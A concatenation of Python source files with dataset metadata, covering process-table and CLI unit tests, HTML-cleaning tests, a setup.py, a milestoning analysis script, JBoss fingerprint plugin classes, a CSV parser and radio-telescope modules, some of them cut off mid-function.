# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import unittest
import psi
class ProcessAttributeTests(unittest.TestCase):
"""Check the bahaviour of some process attributes
Some process attributes must be present on all processes, these
tests check for this.
"""
if __name__ == '__main__':
unittest.main()
| 31.978022 | 71 | 0.679038 | # The MIT License
#
# Copyright (C) 2008-2009 Floris Bruynooghe
#
# Copyright (C) 2008-2009 Abilisoft Ltd.
#
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import unittest
import psi
class ProcessTableTests(unittest.TestCase):
    """Basic behaviour of psi.process.ProcessTable: a read-only dict
    mapping pids to Process objects."""

    def setUp(self):
        self.archtype = psi.arch.arch_type()
        self.pt = psi.process.ProcessTable()

    def test_type(self):
        # assertTrue replaces the deprecated assert_ alias throughout.
        self.assertTrue(isinstance(self.pt, psi.process.ProcessTable))
        self.assertTrue(isinstance(self.pt, dict))

    def test_len_nonzero(self):
        # A live system always has at least one process.
        self.assertTrue(len(self.pt) > 0)

    def test_keys(self):
        # pid 1 is expected to be present on every supported platform.
        self.assertTrue(1 in self.pt)

    def test_vals(self):
        init = self.pt[1]
        self.assertTrue(isinstance(init, psi.process.Process))

    def test_setitem(self):
        # The table is read-only: mutation must raise TypeError.
        self.assertRaises(TypeError, self.pt.__setitem__, 123, 'dummy')

    def test_delitem(self):
        self.assertRaises(TypeError, self.pt.__delitem__, 1)
class ProcessAttributeTests(unittest.TestCase):
    """Check the behaviour of some process attributes

    Some process attributes must be present on all processes, these
    tests check for this.
    """

    def setUp(self):
        self.archtype = psi.arch.arch_type()

    def test_name(self):
        for p in psi.process.ProcessTable().values():
            # assertTrue replaces the deprecated assert_ alias; str(p) is
            # the failure message identifying the offending process.
            self.assertTrue(p.name, str(p))

    def test_argc(self):
        for p in psi.process.ProcessTable().values():
            try:
                self.assertTrue(p.argc >= 0, '%s, argc=%s' % (p, p.argc))
            except psi.AttrInsufficientPrivsError:
                # On Darwin, argc of other users' processes may be
                # unreadable; anywhere else this is a real failure.
                if isinstance(self.archtype, psi.arch.ArchDarwin):
                    self.assertTrue(p.euid != os.geteuid())
                else:
                    raise

    def test_command(self):
        for p in psi.process.ProcessTable().values():
            self.assertTrue(p.command, str(p))
if __name__ == '__main__':
unittest.main()
| 1,099 | 22 | 322 |
43a5a927474a2097f19c573545a41d741d328775 | 6,151 | py | Python | tests/test_main.py | andyphelps/purgeraw | b074ff0fff06e0e61d6d0423249aee3129d846dc | [
"MIT"
] | null | null | null | tests/test_main.py | andyphelps/purgeraw | b074ff0fff06e0e61d6d0423249aee3129d846dc | [
"MIT"
] | null | null | null | tests/test_main.py | andyphelps/purgeraw | b074ff0fff06e0e61d6d0423249aee3129d846dc | [
"MIT"
] | null | null | null | import os
import tempfile
from contextlib import contextmanager
from typing import Generator, Optional
from unittest.mock import patch, Mock, call
import pytest # type: ignore
from click.testing import CliRunner, Result
import purgeraw.main
from purgeraw.index_extraction import indexer
| 50.00813 | 113 | 0.519915 | import os
import tempfile
from contextlib import contextmanager
from typing import Generator, Optional
from unittest.mock import patch, Mock, call
import pytest # type: ignore
from click.testing import CliRunner, Result
import purgeraw.main
from purgeraw.index_extraction import indexer
class TestMain:
    """CLI-level tests for purgeraw.main.main, driven through click's
    CliRunner with the collaborator functions patched out."""
    @contextmanager
    def make_test_dir(self) -> Generator[str, None, None]:
        """Yield an empty temporary directory, removed again on exit."""
        tempdir: Optional[str] = None
        try:
            tempdir = tempfile.mkdtemp("_purgeraw")
            yield tempdir
        finally:
            if tempdir is not None:
                os.rmdir(tempdir)
    @pytest.fixture
    def runner(self) -> CliRunner:
        return CliRunner()
    def test_when_missing_input_dir_then_fails(self, runner: CliRunner) -> None:
        result: Result = runner.invoke(purgeraw.main.main, [])
        # click exits with 2 for usage errors.
        assert result.exit_code == 2
        assert "Error: Missing argument '<directory>'." in result.output
    def test_when_input_dir_not_exists_then_fails(self, runner: CliRunner) -> None:
        result: Result = runner.invoke(purgeraw.main.main, ["/flibble1212"])
        assert result.exit_code == 2
        assert "Path '/flibble1212' does not exist." in result.output
    # The patched collaborators appear to be curried: the first call
    # configures them and returns the callable used for the second
    # (per-run) call -- hence side_effect = [the mock itself, final value]
    # and the two-entry call_args_list assertions below.
    @patch.object(purgeraw.main, purgeraw.main.directory_walker.__name__)
    @patch.object(purgeraw.main, purgeraw.main.purge.__name__)
    @patch.object(purgeraw.main, purgeraw.main.fake_deleter.__name__)
    def test_when_input_dir_present_then_walker_purger_and_fake_deleter_called(self,
                                                                               deleter_mock: Mock,
                                                                               purger_mock: Mock,
                                                                               walker_mock: Mock,
                                                                               runner: CliRunner) -> None:
        walker_mock.side_effect = [walker_mock, ["/some/dir/fred.cr3"]]
        purger_mock.side_effect = [purger_mock, ["/some/dir/fred.cr3"]]
        dirname: str
        with self.make_test_dir() as dirname:
            result: Result = runner.invoke(purgeraw.main.main, [dirname])
            assert result.exit_code == 0
            assert walker_mock.call_args_list == [call(["cr3", "xmp", "jpg"]),
                                                  call(dirname)
                                                  ]
            assert purger_mock.call_args_list == [call(["cr3", "xmp"], indexer),
                                                  call(["/some/dir/fred.cr3"])
                                                  ]
            assert deleter_mock.call_args.args[0] == ["/some/dir/fred.cr3"]
    @patch.object(purgeraw.main, purgeraw.main.directory_walker.__name__)
    @patch.object(purgeraw.main, purgeraw.main.purge.__name__)
    @patch.object(purgeraw.main, purgeraw.main.deleter.__name__)
    def test_when_input_dir_present_with_delete_then_walker_purger_and_deleter_called(self,
                                                                                      deleter_mock: Mock,
                                                                                      purger_mock: Mock,
                                                                                      walker_mock: Mock,
                                                                                      runner: CliRunner) -> None:
        walker_mock.side_effect = [walker_mock, ["/some/dir/fred.cr3"]]
        purger_mock.side_effect = [purger_mock, ["/some/dir/fred.cr3"]]
        dirname: str
        with self.make_test_dir() as dirname:
            # "-d" switches from fake_deleter to the real deleter.
            result: Result = runner.invoke(purgeraw.main.main, [dirname, "-d"])
            assert result.exit_code == 0
            assert walker_mock.call_args_list == [call(["cr3", "xmp", "jpg"]),
                                                  call(dirname)
                                                  ]
            assert purger_mock.call_args_list == [call(["cr3", "xmp"], indexer),
                                                  call(["/some/dir/fred.cr3"])
                                                  ]
            assert deleter_mock.call_args.args[0] == ["/some/dir/fred.cr3"]
    @patch.object(purgeraw.main, purgeraw.main.directory_walker.__name__)
    @patch.object(purgeraw.main, purgeraw.main.purge.__name__)
    def test_when_input_dir_present_with_raw_extensions_then_purge_called(self,
                                                                          purger_mock: Mock,
                                                                          walker_mock: Mock,
                                                                          runner: CliRunner) -> None:
        walker_mock.side_effect = [walker_mock, ["/some/dir/fred.cr3"]]
        purger_mock.side_effect = [purger_mock, ["/some/dir/fred.cr3"]]
        dirname: str
        with self.make_test_dir() as dirname:
            # "-r" overrides the raw extensions passed to walker and purge.
            result: Result = runner.invoke(purgeraw.main.main, [dirname, "-r", "cr2", "-r", "raw"])
            assert result.exit_code == 0
            assert walker_mock.call_args_list[0] == call(["cr2", "raw", "jpg"])
            assert purger_mock.call_args_list[0] == call(["cr2", "raw"], indexer)
    @patch.object(purgeraw.main, purgeraw.main.directory_walker.__name__)
    @patch.object(purgeraw.main, purgeraw.main.purge.__name__)
    def test_when_input_dir_present_with_processed_extensions_then_purge_called(self,
                                                                               purger_mock: Mock,
                                                                               walker_mock: Mock,
                                                                               runner: CliRunner) -> None:
        walker_mock.side_effect = [walker_mock, ["/some/dir/fred.cr3"]]
        purger_mock.side_effect = [purger_mock, ["/some/dir/fred.cr3"]]
        dirname: str
        with self.make_test_dir() as dirname:
            # "-p" overrides the processed extension seen by the walker.
            result: Result = runner.invoke(purgeraw.main.main, [dirname, "-p", "png"])
            assert result.exit_code == 0
            assert walker_mock.call_args_list[0] == call(["cr3", "xmp", "png"])
| 4,904 | 933 | 23 |
ffd51ee16a4b7917c17a095b3963c892847c77b5 | 4,564 | py | Python | tests/unit_tests/test_clean_html.py | JobtechSwe/elastic-importers | ae370984f79295a784350f98e695977a1f73647a | [
"Apache-2.0"
] | 2 | 2020-03-02T18:29:08.000Z | 2021-06-09T00:48:24.000Z | tests/unit_tests/test_clean_html.py | JobtechSwe/elastic-importers | ae370984f79295a784350f98e695977a1f73647a | [
"Apache-2.0"
] | 12 | 2019-01-31T09:54:23.000Z | 2021-10-04T11:25:44.000Z | tests/unit_tests/test_clean_html.py | JobtechSwe/elastic-importers | ae370984f79295a784350f98e695977a1f73647a | [
"Apache-2.0"
] | 1 | 2018-11-09T14:44:55.000Z | 2018-11-09T14:44:55.000Z | import pytest
import json
import os
import logging
from importers.common.helpers import clean_html
log = logging.getLogger(__name__)
current_dir = os.path.dirname(os.path.realpath(__file__)) + '/'
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
@pytest.mark.unit
| 35.107692 | 203 | 0.724145 | import pytest
import json
import os
import logging
from importers.common.helpers import clean_html
log = logging.getLogger(__name__)
current_dir = os.path.dirname(os.path.realpath(__file__)) + '/'
@pytest.mark.unit
def test_clean_html_non_html():
    """Plain text (even with newlines) must pass through unchanged."""
    plain_text = 'En mening utan html fast med radbrytning\nAndra raden kommer här'
    assert clean_html(plain_text) == plain_text
@pytest.mark.unit
def test_clean_html_br():
    """<br /> becomes a newline; inline <b> tags are stripped."""
    cleaned = clean_html('<b>Rubrik</b>Rad 1<br />Rad 2')
    expected = 'RubrikRad 1\nRad 2'
    assert cleaned == expected
@pytest.mark.unit
def test_clean_html_p_tags():
    """Sibling <p> blocks are separated by a blank line."""
    cleaned = clean_html('<p>Paragraf 1</p><p>Paragraf 2</p>')
    assert cleaned == 'Paragraf 1\n\nParagraf 2'
@pytest.mark.unit
def test_clean_html_nested_p_tags():
    """Nested <p> tags each collapse to single newlines."""
    markup = '<p>Paragraf 1<p>Nästlad paragraf</p>Och fortsättning paragraf 1</p><p>Paragraf 2</p>'
    assert clean_html(markup) == 'Paragraf 1\nNästlad paragraf\nOch fortsättning paragraf 1\nParagraf 2'
@pytest.mark.unit
def test_clean_html_ul_and_li_tags():
    """Each <li> item becomes its own line; list wrappers are removed."""
    output = clean_html(
        '<p><strong>DIN ROLL:</strong></p><ul><li>Helhetsansvar för implementationsprocessen.</li><li>Planläggning och projektledning.</li><li>Analys och migrering av kundens data.</li></ul>Efter lista')
    expected_output = 'DIN ROLL:\nHelhetsansvar för implementationsprocessen.\nPlanläggning och projektledning.\nAnalys och migrering av kundens data.\nEfter lista'
    assert expected_output == output
@pytest.mark.unit
def test_clean_html_headlines():
    """Every heading level h1-h6 is stripped and followed by a newline."""
    expected = 'Rubrik\nBrödtext här'
    for level in range(1, 7):
        markup = '<h%s>Rubrik</h%s>Brödtext här' % (level, level)
        assert clean_html(markup) == expected
@pytest.mark.unit
def test_clean_non_valid_html():
    """Malformed markup (missing/mismatched tags, non-XHTML <br>,
    unknown attributes) is still cleaned gracefully."""
    assert 'Paragraf 1 utan sluttag.' == clean_html('<p>Paragraf 1 utan sluttag.')
    assert 'Paragraf 1 utan starttag.' == clean_html('Paragraf 1 utan starttag.</p>')
    assert 'brtag som inte är\nxhtml' == clean_html('brtag som inte är<br>xhtml')
    assert 'Helt fel rubrik' == clean_html('<h1>Helt fel rubrik</h2>')
    assert 'Eget attribut' == clean_html('<h1 hittepå="test">Eget attribut</h1>')
@pytest.mark.unit
def test_clean_script_tags():
    """<script> elements are removed entirely, including their contents."""
    assert '' == clean_html('<script>alert("test");</script>')
    assert 'Lite text. Lite till. Och lite till.' == clean_html(
        '<script>alert("test");</script>Lite text. Lite till. <script>alert("test");</script>Och lite till.')
@pytest.mark.unit
def test_clean_html_from_description():
    """A real ad description loses its HTML tags but keeps line breaks."""
    ads = get_source_ads_from_file()
    ad = get_source_ad('23483261', ads)
    cleaned = clean_html(ad['annonstextFormaterad'])
    assert '</p>' not in cleaned
    assert '\n' in cleaned
@pytest.mark.unit
def test_clean_html_from_description2():
    """Same check as above against a second real ad fixture."""
    ads = get_source_ads_from_file()
    ad = get_source_ad('8428019', ads)
    cleaned = clean_html(ad['annonstextFormaterad'])
    assert '</p>' not in cleaned
    assert '\n' in cleaned
@pytest.mark.unit
def test_clean_html_type_none_input():
    """None input yields the empty string rather than raising."""
    assert clean_html(None) == ''
@pytest.mark.unit
def test_clean_html_b_and_p_tags():
    """<b> is stripped and a following <p> starts a new line."""
    # BUG FIX: this function was named test_clean_html_p_tags, which
    # redefined -- and thereby silently disabled -- the earlier test of
    # the same name in this module. Renamed so pytest collects both.
    input = '<b>Dina arbetsuppgifter</b><p>Du kommer att undervisa inom ämnet trädgård.'
    expected_output = 'Dina arbetsuppgifter\nDu kommer att undervisa inom ämnet trädgård.'
    assert clean_html(input) == expected_output
@pytest.mark.unit
def test_clean_html_p_tags_no_previous_sibling():
    """A <p> with no preceding element still gets a newline before its text."""
    markup = 'Dina arbetsuppgifter<p>Du kommer att undervisa inom ämnet trädgård.'
    assert clean_html(markup) == 'Dina arbetsuppgifter\nDu kommer att undervisa inom ämnet trädgård.'
@pytest.mark.unit
def test_clean_html_double_p_tags():
    """Back-to-back </p><p> collapses to a single newline here."""
    markup = '<p><b>Dina arbetsuppgifter</b></p><p>Du kommer att undervisa inom ämnet trädgård.'
    assert clean_html(markup) == 'Dina arbetsuppgifter\nDu kommer att undervisa inom ämnet trädgård.'
def get_source_ads_from_file():
    """Load the test-ad fixtures shipped under test_resources/."""
    fixture_path = current_dir + 'test_resources/platsannonser_source_test_import.json'
    with open(fixture_path, encoding='utf-8') as json_file:
        return json.load(json_file)['testannonser']
def get_source_ad(annons_id, ads):
    """Return the ad dict whose annonsId matches, normalising annonsId to str.

    Raises LookupError with a clear message when no ad matches -- the old
    code assigned None and then crashed with an opaque TypeError on
    ``ad['annonsId']``.
    """
    wanted = str(annons_id)
    matches = [ad for ad in ads if str(ad['annonsId']) == wanted]
    if not matches:
        raise LookupError("no test ad with annonsId=%s" % wanted)
    ad = matches[0]
    # NOTE: mutates the shared fixture dict in place (as before).
    ad['annonsId'] = str(ad['annonsId'])
    return ad
| 3,764 | 0 | 354 |
09e85066997bff1c93ece7e7feecfb52d5157f6c | 1,216 | py | Python | setup.py | rafaelravedutti/pairs | 7023107ec4e2a3a6a2a3c21f4114e8178d61ca88 | [
"MIT"
] | null | null | null | setup.py | rafaelravedutti/pairs | 7023107ec4e2a3a6a2a3c21f4114e8178d61ca88 | [
"MIT"
] | null | null | null | setup.py | rafaelravedutti/pairs | 7023107ec4e2a3a6a2a3c21f4114e8178d61ca88 | [
"MIT"
] | null | null | null | import setuptools
modules = [
'code_gen',
'coupling',
'graph',
'ir',
'mapping',
'sim',
'transformations',
]
setuptools.setup(name='pairs',
description="A code generator for particle simulations",
version="0.0.1",
long_description=readme(),
long_description_content_type="text/markdown",
author="Rafael Ravedutti Lucio Machado",
license='MIT',
author_email="rafael.r.ravedutti@fau.de",
url="https://github.com/rafaelravedutti/pairs",
install_requires=[],
packages=['pairs'] + [f"pairs.{mod}" for mod in modules],
package_dir={'pairs': 'src/pairs'},
package_data={'pairs': ['runtime/*.hpp']},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
project_urls={
"Bug Tracker": "https://github.com/rafaelravedutti/pairs",
"Documentation": "https://github.com/rafaelravedutti/pairs",
"Source Code": "https://github.com/rafaelravedutti/pairs",
},
extras_require={},
tests_require=[],
python_requires=">=3.6",
)
| 26.434783 | 68 | 0.620888 | import setuptools
def readme():
    """Return the contents of README.md (used as the long description)."""
    readme_file = open('README.md')
    try:
        return readme_file.read()
    finally:
        readme_file.close()
# Sub-packages shipped as pairs.<module>.
modules = [
    'code_gen',
    'coupling',
    'graph',
    'ir',
    'mapping',
    'sim',
    'transformations',
]
# Packaging metadata for the "pairs" code generator; the long description is
# read from README.md via readme() (defined just above in this file).
setuptools.setup(name='pairs',
      description="A code generator for particle simulations",
      version="0.0.1",
      long_description=readme(),
      long_description_content_type="text/markdown",
      author="Rafael Ravedutti Lucio Machado",
      license='MIT',
      author_email="rafael.r.ravedutti@fau.de",
      url="https://github.com/rafaelravedutti/pairs",
      install_requires=[],
      packages=['pairs'] + [f"pairs.{mod}" for mod in modules],
      package_dir={'pairs': 'src/pairs'},
      package_data={'pairs': ['runtime/*.hpp']},
      classifiers=[
          "Programming Language :: Python :: 3",
          "License :: OSI Approved :: MIT License",
          "Operating System :: OS Independent",
      ],
      project_urls={
          "Bug Tracker": "https://github.com/rafaelravedutti/pairs",
          "Documentation": "https://github.com/rafaelravedutti/pairs",
          "Source Code": "https://github.com/rafaelravedutti/pairs",
      },
      extras_require={},
      tests_require=[],
      python_requires=">=3.6",
)
| 49 | 0 | 23 |
5e89149ca60c750392ee70c05aab89a6d8044f25 | 1,161 | py | Python | examples/NAMD/analysis/nacl_analysis/datafiles/milestoning_analysis.py | dhimanray/WEMRR | aab019f1d1bb4d6db6dea36f9444167591129322 | [
"BSD-3-Clause"
] | null | null | null | examples/NAMD/analysis/nacl_analysis/datafiles/milestoning_analysis.py | dhimanray/WEMRR | aab019f1d1bb4d6db6dea36f9444167591129322 | [
"BSD-3-Clause"
] | null | null | null | examples/NAMD/analysis/nacl_analysis/datafiles/milestoning_analysis.py | dhimanray/WEMRR | aab019f1d1bb4d6db6dea36f9444167591129322 | [
"BSD-3-Clause"
] | null | null | null | #THIS CODE IS AN EXAMPLE HOW TO COMPUTE VARIOUS PROPERTIES
import numpy as np
import wemrr
# Example: compute kinetic/thermodynamic properties from milestoning data
# with the wemrr package.
milestones = [2.45,2.7,3.5,4.5,5.5,7.0,9.0]

# --- Steady-state kernel and mean first passage time ---------------------
K,t,Nhit = wemrr.compute_kernel(milestones)
# MFPT from r=2.7 to r=7.0 (milestone indices 1 and 5).
print(wemrr.MFPT(K,t,1,5))

# --- Equilibrium kernel and free-energy profile --------------------------
G = wemrr.free_energy(K,t,milestones,radial=True)
print(G)

# --- MFPT with bootstrapped error bars -----------------------------------
N_total = 300
interval = 10
K_list = wemrr.Monte_Carlo_bootstrapping(N_total,K,t,Nhit,interval)
print(K_list)
mfpt_list = np.array([wemrr.MFPT(K_sample,t,1,5) for K_sample in K_list])
mfpt_mean = np.mean(mfpt_list)
mfpt_std = np.std(mfpt_list)
mfpt_err = 1.96*mfpt_std  # 95% confidence interval
print("Mean First Passage Time = ",mfpt_mean," +/- ",mfpt_err)
| 25.8 | 67 | 0.534884 | #THIS CODE IS AN EXAMPLE HOW TO COMPUTE VARIOUS PROPERTIES
import numpy as np
import wemrr
# Milestone positions along the reaction coordinate (presumably radii for the
# NaCl distance coordinate — TODO confirm against the wemrr documentation).
milestones = [2.45,2.7,3.5,4.5,5.5,7.0,9.0]
#==================================================
#Compute steady state K and mean first passage time
#===================================================
K,t,Nhit = wemrr.compute_kernel(milestones)
#MFPT from r=2.7 to r=7.0
# (indices 1 and 5 refer to positions in the `milestones` list above)
print(wemrr.MFPT(K,t,1,5))
#==================================================
#Compute equilibrium K and free energy profile
#===================================================
G = wemrr.free_energy(K,t,milestones,radial=True)
print(G)
#===================================================
#Compute MFPT with error bars
#===================================================
# Bootstrap parameters: N_total resamples, sampled every `interval`.
N_total = 300
interval = 10
K_list = wemrr.Monte_Carlo_bootstrapping(N_total,K,t,Nhit,interval)
print(K_list)
# Recompute the 1->5 MFPT for every bootstrapped kernel.
mfpt_list = []
for i in range(len(K_list)):
    mfpt_list.append(wemrr.MFPT(K_list[i],t,1,5))
mfpt_list = np.array(mfpt_list)
mfpt_mean = np.mean(mfpt_list)
mfpt_std = np.std(mfpt_list)
mfpt_err = 1.96*mfpt_std #95% confidence interval
print("Mean First Passage Time = ",mfpt_mean," +/- ",mfpt_err)
| 0 | 0 | 0 |
bafe4c8ca292b8f5e70f126e35e44deb24859a0f | 856 | py | Python | plugins/jboss.py | antoniotrento/wig | f43cc8c79444b8dd31111dc08d9426c305d7c827 | [
"BSD-2-Clause"
] | 3 | 2019-03-24T16:59:40.000Z | 2021-04-07T16:09:38.000Z | plugins/jboss.py | ustayready/wig | cff1a6c42dd4d4565b8f147c208b46edb314b697 | [
"BSD-2-Clause"
] | null | null | null | plugins/jboss.py | ustayready/wig | cff1a6c42dd4d4565b8f147c208b46edb314b697 | [
"BSD-2-Clause"
] | 2 | 2017-08-26T22:58:05.000Z | 2020-11-20T10:27:13.000Z | from classes.specializedRequesters import CMSReqMD5, CMSReqString, CMSReqRegex
| 27.612903 | 78 | 0.713785 | from classes.specializedRequesters import CMSReqMD5, CMSReqString, CMSReqRegex
class JBossMD5(CMSReqMD5):
    """JBoss fingerprinting via MD5 checksums (data/cms/md5/jboss.json)."""
    def __init__(self, host, cache, results):
        super().__init__(host, cache, results)
        self.name, self.prefix = "JBoss", [""]
        self.data_file = "data/cms/md5/jboss.json"
class JBossString(CMSReqString):
    """JBoss fingerprinting via literal string matches (data/cms/string/jboss.json)."""
    def __init__(self, host, cache, results):
        super().__init__(host, cache, results)
        self.name, self.prefix = "JBoss", [""]
        self.data_file = "data/cms/string/jboss.json"
class JBossRegex(CMSReqRegex):
    """JBoss fingerprinting via regular expressions (data/cms/regex/jboss.json)."""
    def __init__(self, host, cache, results):
        super().__init__(host, cache, results)
        self.name, self.prefix = "JBoss", [""]
        self.data_file = "data/cms/regex/jboss.json"
def get_instances(host, cache, results):
    """Instantiate one of each JBoss fingerprinting plugin."""
    plugin_classes = (JBossMD5, JBossString, JBossRegex)
    return [plugin(host, cache, results) for plugin in plugin_classes]
| 590 | 25 | 161 |
beb7612925a2daf6ba5024db5d6e7aa1ba05d20c | 1,018 | py | Python | youtubedataSaveToCSV.py | eddieir/youtube_analysis | 21ccb15c7214d9a203b4d6e6848a36d250835b98 | [
"MIT"
] | 7 | 2018-12-08T13:57:29.000Z | 2021-04-06T17:02:50.000Z | youtubedataSaveToCSV.py | eddieir/youtube_analysis | 21ccb15c7214d9a203b4d6e6848a36d250835b98 | [
"MIT"
] | null | null | null | youtubedataSaveToCSV.py | eddieir/youtube_analysis | 21ccb15c7214d9a203b4d6e6848a36d250835b98 | [
"MIT"
] | 1 | 2018-12-08T13:57:35.000Z | 2018-12-08T13:57:35.000Z | import requests
import pandas as pd
import numpy as np
from bs4 import BeautifulSoup
import csv
# Parse 'you.csv' where each channel record spans six consecutive rows:
# rows 0-4 carry one field each (grade, channel, uploads, subscribers, views)
# and row 5 terminates the record. Presumably a SocialBlade-style export —
# TODO confirm the exact source format.
data = []
with open('you.csv') as csvfile:
    reader = csv.reader(csvfile)
    next(reader)
    datum = {}
    for idx, row in enumerate(reader):
        # Position of this row within the current six-row record.
        mod = (idx % 6)
        if mod < 5:
            if mod == 0:
                datum['grade'] = str(row[0])
            elif mod == 1:
                datum['channel'] = str(row[0])
            elif mod == 2:
                # '--' marks missing counts; commas are thousands separators.
                datum['uploads'] = int(row[0].replace(
                    ',', '')) if row[0] != '--' else 0
            elif mod == 3:
                datum['subscribers'] = int(row[0].replace(
                    ',', '')) if row[0] != '--' else 0
            elif mod == 4:
                datum['views'] = int(row[0].replace(
                    ',', '')) if row[0] != '--' else 0
        else:
            # Sixth row: record complete — store it and start a new one.
            data.append(datum)
            datum = {}
df = pd.DataFrame(data)
df.head()  # NOTE(review): return value discarded; only useful in a notebook
df.to_csv('formatted_youtube_data.csv')
#print (idx, row)
| 28.277778 | 58 | 0.452849 | import requests
import pandas as pd
import numpy as np
from bs4 import BeautifulSoup
import csv
# Parse 'you.csv' where each channel record spans six consecutive rows:
# rows 0-4 carry one field each (grade, channel, uploads, subscribers, views)
# and row 5 terminates the record. Presumably a SocialBlade-style export —
# TODO confirm the exact source format.
data = []
with open('you.csv') as csvfile:
    reader = csv.reader(csvfile)
    next(reader)
    datum = {}
    for idx, row in enumerate(reader):
        # Position of this row within the current six-row record.
        mod = (idx % 6)
        if mod < 5:
            if mod == 0:
                datum['grade'] = str(row[0])
            elif mod == 1:
                datum['channel'] = str(row[0])
            elif mod == 2:
                # '--' marks missing counts; commas are thousands separators.
                datum['uploads'] = int(row[0].replace(
                    ',', '')) if row[0] != '--' else 0
            elif mod == 3:
                datum['subscribers'] = int(row[0].replace(
                    ',', '')) if row[0] != '--' else 0
            elif mod == 4:
                datum['views'] = int(row[0].replace(
                    ',', '')) if row[0] != '--' else 0
        else:
            # Sixth row: record complete — store it and start a new one.
            data.append(datum)
            datum = {}
df = pd.DataFrame(data)
df.head()  # NOTE(review): return value discarded; only useful in a notebook
df.to_csv('formatted_youtube_data.csv')
#print (idx, row)
| 0 | 0 | 0 |
d14b679b3f228823b713d182245105a9b779c4e8 | 59 | py | Python | social/backends/eveonline.py | raccoongang/python-social-auth | 81c0a542d158772bd3486d31834c10af5d5f08b0 | [
"BSD-3-Clause"
] | 1,987 | 2015-01-01T16:12:45.000Z | 2022-03-29T14:24:25.000Z | social/backends/eveonline.py | raccoongang/python-social-auth | 81c0a542d158772bd3486d31834c10af5d5f08b0 | [
"BSD-3-Clause"
] | 731 | 2015-01-01T22:55:25.000Z | 2022-03-10T15:07:51.000Z | virtual/lib/python3.6/site-packages/social/backends/eveonline.py | dennismwaniki67/awards | 80ed10541f5f751aee5f8285ab1ad54cfecba95f | [
"MIT"
] | 1,082 | 2015-01-01T16:27:26.000Z | 2022-03-22T21:18:33.000Z | from social_core.backends.eveonline import EVEOnlineOAuth2
| 29.5 | 58 | 0.898305 | from social_core.backends.eveonline import EVEOnlineOAuth2
| 0 | 0 | 0 |
c5036a969593407a06322d81489d228e094221fd | 3,631 | py | Python | dreambeam/telescopes/rt.py | creaneroDIAS/dreamBeam | b7345744b87648126193fb7e81c8519a4e66d20d | [
"ISC"
] | null | null | null | dreambeam/telescopes/rt.py | creaneroDIAS/dreamBeam | b7345744b87648126193fb7e81c8519a4e66d20d | [
"ISC"
] | null | null | null | dreambeam/telescopes/rt.py | creaneroDIAS/dreamBeam | b7345744b87648126193fb7e81c8519a4e66d20d | [
"ISC"
] | null | null | null | """rt (i.e. Radio Telescopes) module is for handling real telescope meta-data."""
import os
import glob
import pickle
import dreambeam.telescopes
class TelescopeBndStn(object):
    """Model of one station and one band of a telescope."""
    # Placeholder for the station's feed/antenna pattern (set by subclasses
    # or callers — not populated here).
    feed_pat = None
    def __init__(self, stnPos, stnRot):
        """Set the station's position and attitude.

        stnPos: station position; stnRot: station rotation/attitude.
        Types are not constrained by this class — whatever the caller passes
        is stored as-is.
        """
        self.stnPos = stnPos
        self.stnRot = stnRot
    def getEJones(self):
        """Create ejones for station based on antenna patterns."""
        # Placeholder implementation: no pattern is evaluated yet, so this
        # always returns None.
        ejones = None
        return ejones
class TelescopesWiz():
    """Database over available telescopes patterns."""

    def telbndmdl2dirfile(self, tscopename, band, beammodel):
        """Resolve a (telescope, band, beam-model) triple to its data file.

        Returns a ``(directory, filename)`` tuple where the directory is
        ``<telescopes_dir>/<tscopename>/data/`` and the filename is
        ``<band>_<beammodel>.teldat.p``.
        """
        # Telescope-band metadata lives in the "data/" subdirectory of each
        # telescope's directory.
        directory = "/".join([self.telescopes_dir, tscopename, "data/"])
        filename = "{}_{}.teldat.p".format(band, beammodel)
        return directory, filename
| 38.62766 | 87 | 0.599284 | """rt (i.e. Radio Telescopes) module is for handling real telescope meta-data."""
import os
import glob
import pickle
import dreambeam.telescopes
class TelescopeBndStn(object):
    """One telescope station observing in one band."""

    # Placeholder for the station's feed/antenna pattern.
    feed_pat = None

    def __init__(self, stnPos, stnRot):
        """Store the station's position (stnPos) and attitude (stnRot)."""
        self.stnPos = stnPos
        self.stnRot = stnRot

    def getEJones(self):
        """Create the station's E-Jones from its antenna patterns.

        Placeholder: no pattern is evaluated yet, so None is returned.
        """
        return None
class TelescopesWiz():
    """Database over available telescope/band/beam-model data files.

    On construction, scans the ``dreambeam.telescopes`` package directory for
    telescope sub-directories and indexes the pickled ``*_*.teldat.p`` files
    found under each telescope's ``data/`` directory as
    ``tbdata[telescope][band][beammodel] -> station names``.
    """
    def __init__(self):
        self.telescopes_dir = os.path.dirname(dreambeam.telescopes.__file__)
        # Telescope candidates: every sub-directory of the package directory.
        ls = os.listdir(self.telescopes_dir)
        ds = []
        for p in ls:
            if os.path.isdir(self.telescopes_dir+'/'+p):
                ds.append(p)
        self.tbdata = {}
        # Keep only candidates that actually have a data/ metadata directory.
        for dd in ds:
            tbdata_dir = self.telbndmdl2dirfile(dd, '', '')[0]
            if os.path.isdir(tbdata_dir):
                t = os.path.basename(dd)
                self.tbdata[t] = {}
        # Find bands & beam models per telescope from the *_*.teldat.p names.
        for tel in list(self.tbdata.keys()):
